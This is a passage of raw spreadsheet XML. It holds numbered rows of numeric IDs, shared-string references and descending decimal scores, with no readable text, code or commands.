    <row r="19765" ht="15.75" customHeight="1">
      <c r="A19765" s="1">
        <v>2711.0</v>
      </c>
      <c r="B19765" s="2">
        <v>3.488406E7</v>
      </c>
      <c r="C19765" s="2" t="s">
        <v>19052</v>
      </c>
      <c r="D19765" s="2">
        <v>1.0</v>
      </c>
      <c r="E19765" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19765" s="2">
        <v>0.1373015873015873</v>
      </c>
    </row>
    <row r="19766" ht="15.75" customHeight="1">
      <c r="A19766" s="1">
        <v>960.0</v>
      </c>
      <c r="B19766" s="2">
        <v>2.2686404E7</v>
      </c>
      <c r="C19766" s="2" t="s">
        <v>19053</v>
      </c>
      <c r="D19766" s="2">
        <v>1.0</v>
      </c>
      <c r="E19766" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19766" s="2">
        <v>0.1372053872053872</v>
      </c>
    </row>
    <row r="19767" ht="15.75" customHeight="1">
      <c r="A19767" s="1">
        <v>3458.0</v>
      </c>
      <c r="B19767" s="2">
        <v>3.828309E7</v>
      </c>
      <c r="C19767" s="2" t="s">
        <v>19054</v>
      </c>
      <c r="D19767" s="2">
        <v>1.0</v>
      </c>
      <c r="E19767" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19767" s="2">
        <v>0.1370967741935484</v>
      </c>
    </row>
    <row r="19768" ht="15.75" customHeight="1">
      <c r="A19768" s="1">
        <v>19341.0</v>
      </c>
      <c r="B19768" s="2">
        <v>5.5356847E7</v>
      </c>
      <c r="C19768" s="2" t="s">
        <v>19055</v>
      </c>
      <c r="D19768" s="2">
        <v>1.0</v>
      </c>
      <c r="E19768" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19768" s="2">
        <v>0.1370967741935484</v>
      </c>
    </row>
    <row r="19769" ht="15.75" customHeight="1">
      <c r="A19769" s="1">
        <v>19834.0</v>
      </c>
      <c r="B19769" s="2">
        <v>5.7056117E7</v>
      </c>
      <c r="C19769" s="2" t="s">
        <v>19056</v>
      </c>
      <c r="D19769" s="2">
        <v>1.0</v>
      </c>
      <c r="E19769" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19769" s="2">
        <v>0.1370967741935484</v>
      </c>
    </row>
    <row r="19770" ht="15.75" customHeight="1">
      <c r="A19770" s="1">
        <v>18704.0</v>
      </c>
      <c r="B19770" s="2">
        <v>5.3639291E7</v>
      </c>
      <c r="C19770" s="2" t="s">
        <v>19057</v>
      </c>
      <c r="D19770" s="2">
        <v>1.0</v>
      </c>
      <c r="E19770" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19770" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="19771" ht="15.75" customHeight="1">
      <c r="A19771" s="1">
        <v>8876.0</v>
      </c>
      <c r="B19771" s="2">
        <v>5.4755674E7</v>
      </c>
      <c r="C19771" s="2" t="s">
        <v>19058</v>
      </c>
      <c r="D19771" s="2">
        <v>1.0</v>
      </c>
      <c r="E19771" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19771" s="2">
        <v>0.1369731800766283</v>
      </c>
    </row>
    <row r="19772" ht="15.75" customHeight="1">
      <c r="A19772" s="1">
        <v>20106.0</v>
      </c>
      <c r="B19772" s="2">
        <v>9967042.0</v>
      </c>
      <c r="C19772" s="2" t="s">
        <v>19059</v>
      </c>
      <c r="D19772" s="2">
        <v>1.0</v>
      </c>
      <c r="E19772" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19772" s="2">
        <v>0.1369731800766283</v>
      </c>
    </row>
    <row r="19773" ht="15.75" customHeight="1">
      <c r="A19773" s="1">
        <v>1699.0</v>
      </c>
      <c r="B19773" s="2">
        <v>2.8525492E7</v>
      </c>
      <c r="C19773" s="2" t="s">
        <v>19060</v>
      </c>
      <c r="D19773" s="2">
        <v>1.0</v>
      </c>
      <c r="E19773" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19773" s="2">
        <v>0.1369327073552426</v>
      </c>
    </row>
    <row r="19774" ht="15.75" customHeight="1">
      <c r="A19774" s="1">
        <v>4132.0</v>
      </c>
      <c r="B19774" s="2">
        <v>4.1386573E7</v>
      </c>
      <c r="C19774" s="2" t="s">
        <v>19061</v>
      </c>
      <c r="D19774" s="2">
        <v>1.0</v>
      </c>
      <c r="E19774" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19774" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="19775" ht="15.75" customHeight="1">
      <c r="A19775" s="1">
        <v>11428.0</v>
      </c>
      <c r="B19775" s="2">
        <v>2.1742706E7</v>
      </c>
      <c r="C19775" s="2" t="s">
        <v>19062</v>
      </c>
      <c r="D19775" s="2">
        <v>1.0</v>
      </c>
      <c r="E19775" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19775" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="19776" ht="15.75" customHeight="1">
      <c r="A19776" s="1">
        <v>2605.0</v>
      </c>
      <c r="B19776" s="2">
        <v>3.4409792E7</v>
      </c>
      <c r="C19776" s="2" t="s">
        <v>19063</v>
      </c>
      <c r="D19776" s="2">
        <v>1.0</v>
      </c>
      <c r="E19776" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19776" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="19777" ht="15.75" customHeight="1">
      <c r="A19777" s="1">
        <v>7520.0</v>
      </c>
      <c r="B19777" s="2">
        <v>5.1411015E7</v>
      </c>
      <c r="C19777" s="2" t="s">
        <v>19064</v>
      </c>
      <c r="D19777" s="2">
        <v>1.0</v>
      </c>
      <c r="E19777" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19777" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="19778" ht="15.75" customHeight="1">
      <c r="A19778" s="1">
        <v>14366.0</v>
      </c>
      <c r="B19778" s="2">
        <v>3.8960493E7</v>
      </c>
      <c r="C19778" s="2" t="s">
        <v>19065</v>
      </c>
      <c r="D19778" s="2">
        <v>1.0</v>
      </c>
      <c r="E19778" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19778" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="19779" ht="15.75" customHeight="1">
      <c r="A19779" s="1">
        <v>19997.0</v>
      </c>
      <c r="B19779" s="2">
        <v>5.7706159E7</v>
      </c>
      <c r="C19779" s="2" t="s">
        <v>19066</v>
      </c>
      <c r="D19779" s="2">
        <v>1.0</v>
      </c>
      <c r="E19779" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19779" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="19780" ht="15.75" customHeight="1">
      <c r="A19780" s="1">
        <v>2230.0</v>
      </c>
      <c r="B19780" s="2">
        <v>3.2256751E7</v>
      </c>
      <c r="C19780" s="2" t="s">
        <v>19067</v>
      </c>
      <c r="D19780" s="2">
        <v>1.0</v>
      </c>
      <c r="E19780" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19780" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="19781" ht="15.75" customHeight="1">
      <c r="A19781" s="1">
        <v>18699.0</v>
      </c>
      <c r="B19781" s="2">
        <v>5.3622861E7</v>
      </c>
      <c r="C19781" s="2" t="s">
        <v>19068</v>
      </c>
      <c r="D19781" s="2">
        <v>1.0</v>
      </c>
      <c r="E19781" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19781" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="19782" ht="15.75" customHeight="1">
      <c r="A19782" s="1">
        <v>2447.0</v>
      </c>
      <c r="B19782" s="2">
        <v>3.3705038E7</v>
      </c>
      <c r="C19782" s="2" t="s">
        <v>19069</v>
      </c>
      <c r="D19782" s="2">
        <v>1.0</v>
      </c>
      <c r="E19782" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19782" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="19783" ht="15.75" customHeight="1">
      <c r="A19783" s="1">
        <v>3172.0</v>
      </c>
      <c r="B19783" s="2">
        <v>3.7086583E7</v>
      </c>
      <c r="C19783" s="2" t="s">
        <v>19070</v>
      </c>
      <c r="D19783" s="2">
        <v>1.0</v>
      </c>
      <c r="E19783" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19783" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="19784" ht="15.75" customHeight="1">
      <c r="A19784" s="1">
        <v>3462.0</v>
      </c>
      <c r="B19784" s="2">
        <v>3.8330155E7</v>
      </c>
      <c r="C19784" s="2" t="s">
        <v>19071</v>
      </c>
      <c r="D19784" s="2">
        <v>1.0</v>
      </c>
      <c r="E19784" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19784" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="19785" ht="15.75" customHeight="1">
      <c r="A19785" s="1">
        <v>5319.0</v>
      </c>
      <c r="B19785" s="2">
        <v>4.5284136E7</v>
      </c>
      <c r="C19785" s="2" t="s">
        <v>19072</v>
      </c>
      <c r="D19785" s="2">
        <v>1.0</v>
      </c>
      <c r="E19785" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19785" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="19786" ht="15.75" customHeight="1">
      <c r="A19786" s="1">
        <v>6118.0</v>
      </c>
      <c r="B19786" s="2">
        <v>4.7783372E7</v>
      </c>
      <c r="C19786" s="2" t="s">
        <v>19073</v>
      </c>
      <c r="D19786" s="2">
        <v>1.0</v>
      </c>
      <c r="E19786" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19786" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="19787" ht="15.75" customHeight="1">
      <c r="A19787" s="1">
        <v>6453.0</v>
      </c>
      <c r="B19787" s="2">
        <v>4.8610113E7</v>
      </c>
      <c r="C19787" s="2" t="s">
        <v>19074</v>
      </c>
      <c r="D19787" s="2">
        <v>1.0</v>
      </c>
      <c r="E19787" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19787" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="19788" ht="15.75" customHeight="1">
      <c r="A19788" s="1">
        <v>7355.0</v>
      </c>
      <c r="B19788" s="2">
        <v>5.0997554E7</v>
      </c>
      <c r="C19788" s="2" t="s">
        <v>19075</v>
      </c>
      <c r="D19788" s="2">
        <v>1.0</v>
      </c>
      <c r="E19788" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19788" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="19789" ht="15.75" customHeight="1">
      <c r="A19789" s="1">
        <v>9086.0</v>
      </c>
      <c r="B19789" s="2">
        <v>5.5124202E7</v>
      </c>
      <c r="C19789" s="5" t="s">
        <v>19076</v>
      </c>
      <c r="D19789" s="2">
        <v>1.0</v>
      </c>
      <c r="E19789" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19789" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="19790" ht="15.75" customHeight="1">
      <c r="A19790" s="1">
        <v>13487.0</v>
      </c>
      <c r="B19790" s="2">
        <v>3.5384215E7</v>
      </c>
      <c r="C19790" s="2" t="s">
        <v>19077</v>
      </c>
      <c r="D19790" s="2">
        <v>1.0</v>
      </c>
      <c r="E19790" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19790" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="19791" ht="15.75" customHeight="1">
      <c r="A19791" s="1">
        <v>13990.0</v>
      </c>
      <c r="B19791" s="2">
        <v>3.7376808E7</v>
      </c>
      <c r="C19791" s="2" t="s">
        <v>19078</v>
      </c>
      <c r="D19791" s="2">
        <v>1.0</v>
      </c>
      <c r="E19791" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19791" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="19792" ht="15.75" customHeight="1">
      <c r="A19792" s="1">
        <v>22897.0</v>
      </c>
      <c r="B19792" s="2">
        <v>4.795838E7</v>
      </c>
      <c r="C19792" s="2" t="s">
        <v>19079</v>
      </c>
      <c r="D19792" s="2">
        <v>1.0</v>
      </c>
      <c r="E19792" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19792" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="19793" ht="15.75" customHeight="1">
      <c r="A19793" s="1">
        <v>31051.0</v>
      </c>
      <c r="B19793" s="2">
        <v>4.7958379E7</v>
      </c>
      <c r="C19793" s="2" t="s">
        <v>19079</v>
      </c>
      <c r="D19793" s="2">
        <v>1.0</v>
      </c>
      <c r="E19793" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19793" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="19794" ht="15.75" customHeight="1">
      <c r="A19794" s="1">
        <v>25783.0</v>
      </c>
      <c r="B19794" s="2">
        <v>1.4662651E7</v>
      </c>
      <c r="C19794" s="2" t="s">
        <v>19080</v>
      </c>
      <c r="D19794" s="2">
        <v>1.0</v>
      </c>
      <c r="E19794" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19794" s="2">
        <v>0.1359126984126985</v>
      </c>
    </row>
    <row r="19795" ht="15.75" customHeight="1">
      <c r="A19795" s="1">
        <v>6723.0</v>
      </c>
      <c r="B19795" s="2">
        <v>4.9286948E7</v>
      </c>
      <c r="C19795" s="2" t="s">
        <v>19081</v>
      </c>
      <c r="D19795" s="2">
        <v>1.0</v>
      </c>
      <c r="E19795" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19795" s="2">
        <v>0.1358974358974359</v>
      </c>
    </row>
    <row r="19796" ht="15.75" customHeight="1">
      <c r="A19796" s="1">
        <v>28743.0</v>
      </c>
      <c r="B19796" s="2">
        <v>2.8083918E7</v>
      </c>
      <c r="C19796" s="2" t="s">
        <v>19082</v>
      </c>
      <c r="D19796" s="2">
        <v>1.0</v>
      </c>
      <c r="E19796" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19796" s="2">
        <v>0.1358974358974359</v>
      </c>
    </row>
    <row r="19797" ht="15.75" customHeight="1">
      <c r="A19797" s="1">
        <v>16037.0</v>
      </c>
      <c r="B19797" s="2">
        <v>4.5125053E7</v>
      </c>
      <c r="C19797" s="2" t="s">
        <v>19083</v>
      </c>
      <c r="D19797" s="2">
        <v>1.0</v>
      </c>
      <c r="E19797" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19797" s="2">
        <v>0.1358858858858859</v>
      </c>
    </row>
    <row r="19798" ht="15.75" customHeight="1">
      <c r="A19798" s="1">
        <v>2905.0</v>
      </c>
      <c r="B19798" s="2">
        <v>3.580942E7</v>
      </c>
      <c r="C19798" s="2" t="s">
        <v>19084</v>
      </c>
      <c r="D19798" s="2">
        <v>1.0</v>
      </c>
      <c r="E19798" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19798" s="2">
        <v>0.1357012750455374</v>
      </c>
    </row>
    <row r="19799" ht="15.75" customHeight="1">
      <c r="A19799" s="1">
        <v>12049.0</v>
      </c>
      <c r="B19799" s="2">
        <v>2.6362399E7</v>
      </c>
      <c r="C19799" s="2" t="s">
        <v>19085</v>
      </c>
      <c r="D19799" s="2">
        <v>1.0</v>
      </c>
      <c r="E19799" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19799" s="2">
        <v>0.1357012750455374</v>
      </c>
    </row>
    <row r="19800" ht="15.75" customHeight="1">
      <c r="A19800" s="1">
        <v>10650.0</v>
      </c>
      <c r="B19800" s="2">
        <v>1.4152062E7</v>
      </c>
      <c r="C19800" s="2" t="s">
        <v>19086</v>
      </c>
      <c r="D19800" s="2">
        <v>1.0</v>
      </c>
      <c r="E19800" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19800" s="2">
        <v>0.135477582846004</v>
      </c>
    </row>
    <row r="19801" ht="15.75" customHeight="1">
      <c r="A19801" s="1">
        <v>10329.0</v>
      </c>
      <c r="B19801" s="2">
        <v>5.7712788E7</v>
      </c>
      <c r="C19801" s="2" t="s">
        <v>19087</v>
      </c>
      <c r="D19801" s="2">
        <v>1.0</v>
      </c>
      <c r="E19801" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19801" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="19802" ht="15.75" customHeight="1">
      <c r="A19802" s="1">
        <v>2449.0</v>
      </c>
      <c r="B19802" s="2">
        <v>3.3713772E7</v>
      </c>
      <c r="C19802" s="2" t="s">
        <v>19088</v>
      </c>
      <c r="D19802" s="2">
        <v>1.0</v>
      </c>
      <c r="E19802" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19802" s="2">
        <v>0.1353046594982079</v>
      </c>
    </row>
    <row r="19803" ht="15.75" customHeight="1">
      <c r="A19803" s="1">
        <v>5701.0</v>
      </c>
      <c r="B19803" s="2">
        <v>4.6511496E7</v>
      </c>
      <c r="C19803" s="2" t="s">
        <v>19089</v>
      </c>
      <c r="D19803" s="2">
        <v>1.0</v>
      </c>
      <c r="E19803" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19803" s="2">
        <v>0.1353046594982079</v>
      </c>
    </row>
    <row r="19804" ht="15.75" customHeight="1">
      <c r="A19804" s="1">
        <v>570.0</v>
      </c>
      <c r="B19804" s="2">
        <v>1.9081698E7</v>
      </c>
      <c r="C19804" s="2" t="s">
        <v>19090</v>
      </c>
      <c r="D19804" s="2">
        <v>1.0</v>
      </c>
      <c r="E19804" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19804" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="19805" ht="15.75" customHeight="1">
      <c r="A19805" s="1">
        <v>6264.0</v>
      </c>
      <c r="B19805" s="2">
        <v>4.8118409E7</v>
      </c>
      <c r="C19805" s="2" t="s">
        <v>19091</v>
      </c>
      <c r="D19805" s="2">
        <v>1.0</v>
      </c>
      <c r="E19805" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19805" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="19806" ht="15.75" customHeight="1">
      <c r="A19806" s="1">
        <v>7651.0</v>
      </c>
      <c r="B19806" s="2">
        <v>5.1791126E7</v>
      </c>
      <c r="C19806" s="2" t="s">
        <v>19092</v>
      </c>
      <c r="D19806" s="2">
        <v>1.0</v>
      </c>
      <c r="E19806" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19806" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="19807" ht="15.75" customHeight="1">
      <c r="A19807" s="1">
        <v>9525.0</v>
      </c>
      <c r="B19807" s="2">
        <v>5.5980269E7</v>
      </c>
      <c r="C19807" s="2" t="s">
        <v>19093</v>
      </c>
      <c r="D19807" s="2">
        <v>1.0</v>
      </c>
      <c r="E19807" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19807" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="19808" ht="15.75" customHeight="1">
      <c r="A19808" s="1">
        <v>14214.0</v>
      </c>
      <c r="B19808" s="2">
        <v>3.8281494E7</v>
      </c>
      <c r="C19808" s="2" t="s">
        <v>19094</v>
      </c>
      <c r="D19808" s="2">
        <v>1.0</v>
      </c>
      <c r="E19808" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19808" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="19809" ht="15.75" customHeight="1">
      <c r="A19809" s="1">
        <v>14215.0</v>
      </c>
      <c r="B19809" s="2">
        <v>3.8281494E7</v>
      </c>
      <c r="C19809" s="2" t="s">
        <v>19095</v>
      </c>
      <c r="D19809" s="2">
        <v>1.0</v>
      </c>
      <c r="E19809" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19809" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="19810" ht="15.75" customHeight="1">
      <c r="A19810" s="1">
        <v>16083.0</v>
      </c>
      <c r="B19810" s="2">
        <v>4.5372924E7</v>
      </c>
      <c r="C19810" s="2" t="s">
        <v>19096</v>
      </c>
      <c r="D19810" s="2">
        <v>1.0</v>
      </c>
      <c r="E19810" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19810" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="19811" ht="15.75" customHeight="1">
      <c r="A19811" s="1">
        <v>10216.0</v>
      </c>
      <c r="B19811" s="2">
        <v>5.744769E7</v>
      </c>
      <c r="C19811" s="2" t="s">
        <v>19097</v>
      </c>
      <c r="D19811" s="2">
        <v>1.0</v>
      </c>
      <c r="E19811" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19811" s="2">
        <v>0.1351575456053069</v>
      </c>
    </row>
    <row r="19812" ht="15.75" customHeight="1">
      <c r="A19812" s="1">
        <v>9405.0</v>
      </c>
      <c r="B19812" s="2">
        <v>5.576675E7</v>
      </c>
      <c r="C19812" s="2" t="s">
        <v>19098</v>
      </c>
      <c r="D19812" s="2">
        <v>1.0</v>
      </c>
      <c r="E19812" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19812" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="19813" ht="15.75" customHeight="1">
      <c r="A19813" s="1">
        <v>15655.0</v>
      </c>
      <c r="B19813" s="2">
        <v>4.3640124E7</v>
      </c>
      <c r="C19813" s="2" t="s">
        <v>19099</v>
      </c>
      <c r="D19813" s="2">
        <v>1.0</v>
      </c>
      <c r="E19813" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19813" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="19814" ht="15.75" customHeight="1">
      <c r="A19814" s="1">
        <v>16444.0</v>
      </c>
      <c r="B19814" s="2">
        <v>4.6399607E7</v>
      </c>
      <c r="C19814" s="2" t="s">
        <v>19100</v>
      </c>
      <c r="D19814" s="2">
        <v>1.0</v>
      </c>
      <c r="E19814" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19814" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="19815" ht="15.75" customHeight="1">
      <c r="A19815" s="1">
        <v>16816.0</v>
      </c>
      <c r="B19815" s="2">
        <v>4.7836312E7</v>
      </c>
      <c r="C19815" s="2" t="s">
        <v>19101</v>
      </c>
      <c r="D19815" s="2">
        <v>1.0</v>
      </c>
      <c r="E19815" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19815" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="19816" ht="15.75" customHeight="1">
      <c r="A19816" s="1">
        <v>31778.0</v>
      </c>
      <c r="B19816" s="2">
        <v>5.221691E7</v>
      </c>
      <c r="C19816" s="2" t="s">
        <v>19102</v>
      </c>
      <c r="D19816" s="2">
        <v>1.0</v>
      </c>
      <c r="E19816" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19816" s="2">
        <v>0.1350308641975309</v>
      </c>
    </row>
    <row r="19817" ht="15.75" customHeight="1">
      <c r="A19817" s="1">
        <v>3454.0</v>
      </c>
      <c r="B19817" s="2">
        <v>3.827113E7</v>
      </c>
      <c r="C19817" s="2" t="s">
        <v>19103</v>
      </c>
      <c r="D19817" s="2">
        <v>1.0</v>
      </c>
      <c r="E19817" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19817" s="2">
        <v>0.1348238482384824</v>
      </c>
    </row>
    <row r="19818" ht="15.75" customHeight="1">
      <c r="A19818" s="1">
        <v>15159.0</v>
      </c>
      <c r="B19818" s="2">
        <v>4.1988431E7</v>
      </c>
      <c r="C19818" s="2" t="s">
        <v>19104</v>
      </c>
      <c r="D19818" s="2">
        <v>1.0</v>
      </c>
      <c r="E19818" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19818" s="2">
        <v>0.1348039215686275</v>
      </c>
    </row>
    <row r="19819" ht="15.75" customHeight="1">
      <c r="A19819" s="1">
        <v>17019.0</v>
      </c>
      <c r="B19819" s="2">
        <v>4.8456373E7</v>
      </c>
      <c r="C19819" s="2" t="s">
        <v>19105</v>
      </c>
      <c r="D19819" s="2">
        <v>1.0</v>
      </c>
      <c r="E19819" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19819" s="2">
        <v>0.1348039215686275</v>
      </c>
    </row>
    <row r="19820" ht="15.75" customHeight="1">
      <c r="A19820" s="1">
        <v>7569.0</v>
      </c>
      <c r="B19820" s="2">
        <v>5.1560342E7</v>
      </c>
      <c r="C19820" s="2" t="s">
        <v>19106</v>
      </c>
      <c r="D19820" s="2">
        <v>1.0</v>
      </c>
      <c r="E19820" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19820" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="19821" ht="15.75" customHeight="1">
      <c r="A19821" s="1">
        <v>10392.0</v>
      </c>
      <c r="B19821" s="2">
        <v>9044754.0</v>
      </c>
      <c r="C19821" s="2" t="s">
        <v>19107</v>
      </c>
      <c r="D19821" s="2">
        <v>1.0</v>
      </c>
      <c r="E19821" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19821" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="19822" ht="15.75" customHeight="1">
      <c r="A19822" s="1">
        <v>15610.0</v>
      </c>
      <c r="B19822" s="2">
        <v>4.3514218E7</v>
      </c>
      <c r="C19822" s="2" t="s">
        <v>19108</v>
      </c>
      <c r="D19822" s="2">
        <v>1.0</v>
      </c>
      <c r="E19822" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19822" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="19823" ht="15.75" customHeight="1">
      <c r="A19823" s="1">
        <v>15634.0</v>
      </c>
      <c r="B19823" s="2">
        <v>4.3579749E7</v>
      </c>
      <c r="C19823" s="2" t="s">
        <v>19109</v>
      </c>
      <c r="D19823" s="2">
        <v>1.0</v>
      </c>
      <c r="E19823" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19823" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="19824" ht="15.75" customHeight="1">
      <c r="A19824" s="1">
        <v>34090.0</v>
      </c>
      <c r="B19824" s="2">
        <v>9694119.0</v>
      </c>
      <c r="C19824" s="2" t="s">
        <v>19110</v>
      </c>
      <c r="D19824" s="2">
        <v>1.0</v>
      </c>
      <c r="E19824" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19824" s="2">
        <v>0.1345933562428408</v>
      </c>
    </row>
    <row r="19825" ht="15.75" customHeight="1">
      <c r="A19825" s="1">
        <v>1864.0</v>
      </c>
      <c r="B19825" s="2">
        <v>2.9573836E7</v>
      </c>
      <c r="C19825" s="2" t="s">
        <v>19111</v>
      </c>
      <c r="D19825" s="2">
        <v>1.0</v>
      </c>
      <c r="E19825" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19825" s="2">
        <v>0.1345486111111112</v>
      </c>
    </row>
    <row r="19826" ht="15.75" customHeight="1">
      <c r="A19826" s="1">
        <v>2812.0</v>
      </c>
      <c r="B19826" s="2">
        <v>3.5369822E7</v>
      </c>
      <c r="C19826" s="2" t="s">
        <v>19112</v>
      </c>
      <c r="D19826" s="2">
        <v>1.0</v>
      </c>
      <c r="E19826" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19826" s="2">
        <v>0.1344605475040258</v>
      </c>
    </row>
    <row r="19827" ht="15.75" customHeight="1">
      <c r="A19827" s="1">
        <v>138.0</v>
      </c>
      <c r="B19827" s="2">
        <v>1.3514172E7</v>
      </c>
      <c r="C19827" s="2" t="s">
        <v>19113</v>
      </c>
      <c r="D19827" s="2">
        <v>1.0</v>
      </c>
      <c r="E19827" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19827" s="2">
        <v>0.1343434343434343</v>
      </c>
    </row>
    <row r="19828" ht="15.75" customHeight="1">
      <c r="A19828" s="1">
        <v>1469.0</v>
      </c>
      <c r="B19828" s="2">
        <v>2.6956512E7</v>
      </c>
      <c r="C19828" s="2" t="s">
        <v>19114</v>
      </c>
      <c r="D19828" s="2">
        <v>1.0</v>
      </c>
      <c r="E19828" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19828" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="19829" ht="15.75" customHeight="1">
      <c r="A19829" s="1">
        <v>14086.0</v>
      </c>
      <c r="B19829" s="2">
        <v>3.7708809E7</v>
      </c>
      <c r="C19829" s="2" t="s">
        <v>19115</v>
      </c>
      <c r="D19829" s="2">
        <v>1.0</v>
      </c>
      <c r="E19829" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19829" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="19830" ht="15.75" customHeight="1">
      <c r="A19830" s="1">
        <v>25622.0</v>
      </c>
      <c r="B19830" s="2">
        <v>1.4441635E7</v>
      </c>
      <c r="C19830" s="2" t="s">
        <v>19116</v>
      </c>
      <c r="D19830" s="2">
        <v>1.0</v>
      </c>
      <c r="E19830" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19830" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="19831" ht="15.75" customHeight="1">
      <c r="A19831" s="1">
        <v>4023.0</v>
      </c>
      <c r="B19831" s="2">
        <v>4.0966687E7</v>
      </c>
      <c r="C19831" s="2" t="s">
        <v>19117</v>
      </c>
      <c r="D19831" s="2">
        <v>1.0</v>
      </c>
      <c r="E19831" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19831" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
